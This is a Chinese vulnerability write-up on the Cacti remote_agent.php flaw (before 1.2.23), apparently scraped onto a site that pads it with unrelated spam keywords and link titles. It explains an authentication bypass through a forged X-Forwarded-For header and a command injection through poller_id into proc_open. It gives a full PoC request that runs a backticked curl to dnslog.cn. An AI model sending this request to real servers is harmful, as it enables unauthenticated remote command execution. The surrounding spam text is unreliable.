当前位置: 首页 > news >正文

网站平台建设属于什么采购芦苞建网站公司

网站平台建设属于什么采购,芦苞建网站公司,顺德网站建设多少钱,wordpress共用数据库吗1.漏洞描述 Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具,可为用户提供强大且可扩展的操作监控和故障管理框架。 该漏洞存在于remote_agent.php文件中,未经身份验证的恶意攻击者可以通过设置HTTP_变量…

1.漏洞描述

Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具,可为用户提供强大且可扩展的操作监控和故障管理框架。
该漏洞存在于remote_agent.php文件中,未经身份验证的恶意攻击者可以通过设置HTTP_变量绕过身份验证,再通过构造特殊的$poller_id 参数来触发proc_open() 函数,成功利用此漏洞可在目标服务器上执行任意命令,获取服务器的控制权限。

2.影响版本

Cacti < 1.2.23

3.影响范围 

4.漏洞分析

我们先看补丁
https://github.com/Cacti/cacti/commit/7f0e16312dd5ce20f93744ef8b9c3b0f1ece2216
漏洞点主要存在于lib/functions.php、remote_agent.php
分为登录绕过和命令注入

登录绕过

我们先跟进 get_client_addr看看
函数的作用是从 X-Forwarded-For等参数中获取值,filter_var 进行过滤,正确的地址就可以返回,X-Forwarded-For 参数可控,可以对其进行修改 
接下来看remote_client_authorized函数的下半部分
gethostbyaddr 对 client_addr 获取网络主机名,当 $client_name 与 $client_addr 不同时, 进入remote_agent_strip_domain 函数
函数就是截取点号前面的值 大多数情况下,我们传进去的值为 127.0.0.1 时,就会返回 true 了 因此我们可以通过修改 X-Forwarded-For 来绕过这里的认证

命令注入

我们先看一下修复记录
跟进get_nfilter_request_var函数
函数的作用是直接获取参数,没用过滤
这里的 $local_data_ids也是传进来的值,可控。

接下来我们关注这里的 $items ,是从数据库的 poller_item 表中取出来的,默认为空。

接下来当 $items 有了数据并且他的成员中有一个 item 也是一个数组并且键为 action,值为 2 时,即可进入命令注入的漏洞所在

在385 行有 proc_open可以命令执行。
Poc:
GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`curl+dnslog.cn` HTTP/1.1
X-Forwarded-For: 127.0.0.1
Host: localhost.lan
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

5.修复建议

官方已经提供修复的版本,直接 github 下载即可
https://github.com/Cacti/cacti

http://www.yayakq.cn/news/480503/

相关文章:

  • 想在网站卖房怎么做北京网站建设公司有哪些
  • 知名企业网站例子全国十大家装公司排名
  • wordpress图片站网站微信认证费用多少钱
  • 网站开发需要那些人才网址域名ip查询
  • 做二手物资买卖的网站分销平台网站建设桂林
  • 布吉做网站微软做网站软件
  • 珠宝网站建商台北什么网站赚的钱最多
  • 淘宝网官方网站购物商城网站是由什么组成的
  • 车辆对比那个网站做的好江苏省 前置审批 网站
  • 绍兴网站建设seo推广游戏怎么拉人最快
  • 一图读懂制作网站做58网站怎么赚钱
  • 免费建设外贸网站青海h5页面制作
  • 网站建设技术和销售工资新闻式软文范例
  • 青岛煜鹏网站建设公司邯郸市设计公司电话
  • 网站开发属于无形资产吗如何推销自己的产品
  • 如何下载网站模板徐州万网网站建设
  • 北京网站策划服务admin管理员登录
  • 怎样备份网站优化方案英语必修三电子版
  • 山西建设网站企业app应用网站html5模板下载
  • 网站后台上传文章怎么做淘宝wordpress模板
  • 手机网站模板开发工具wordpress地址不能修改密码
  • 加大整合力度网站集约建设公司网站建设支出计入
  • 永清网站建设建设银行中国网站
  • 单页营销型网站模板下载wordpress网站图片丢失
  • 临沂外贸国际网站建设山东建设厅网站专职安全员
  • 子商务网站建设的一般流程图闵行网络推广公司
  • 专业平台网站建设wordpress定时发布没用
  • 品辰设计的网站谁做的建站公司那家好
  • 惠州cms建站系统一个网址建多个网站
  • 网站后台上传用户界面不显示站长工具的使用seo综合查询运营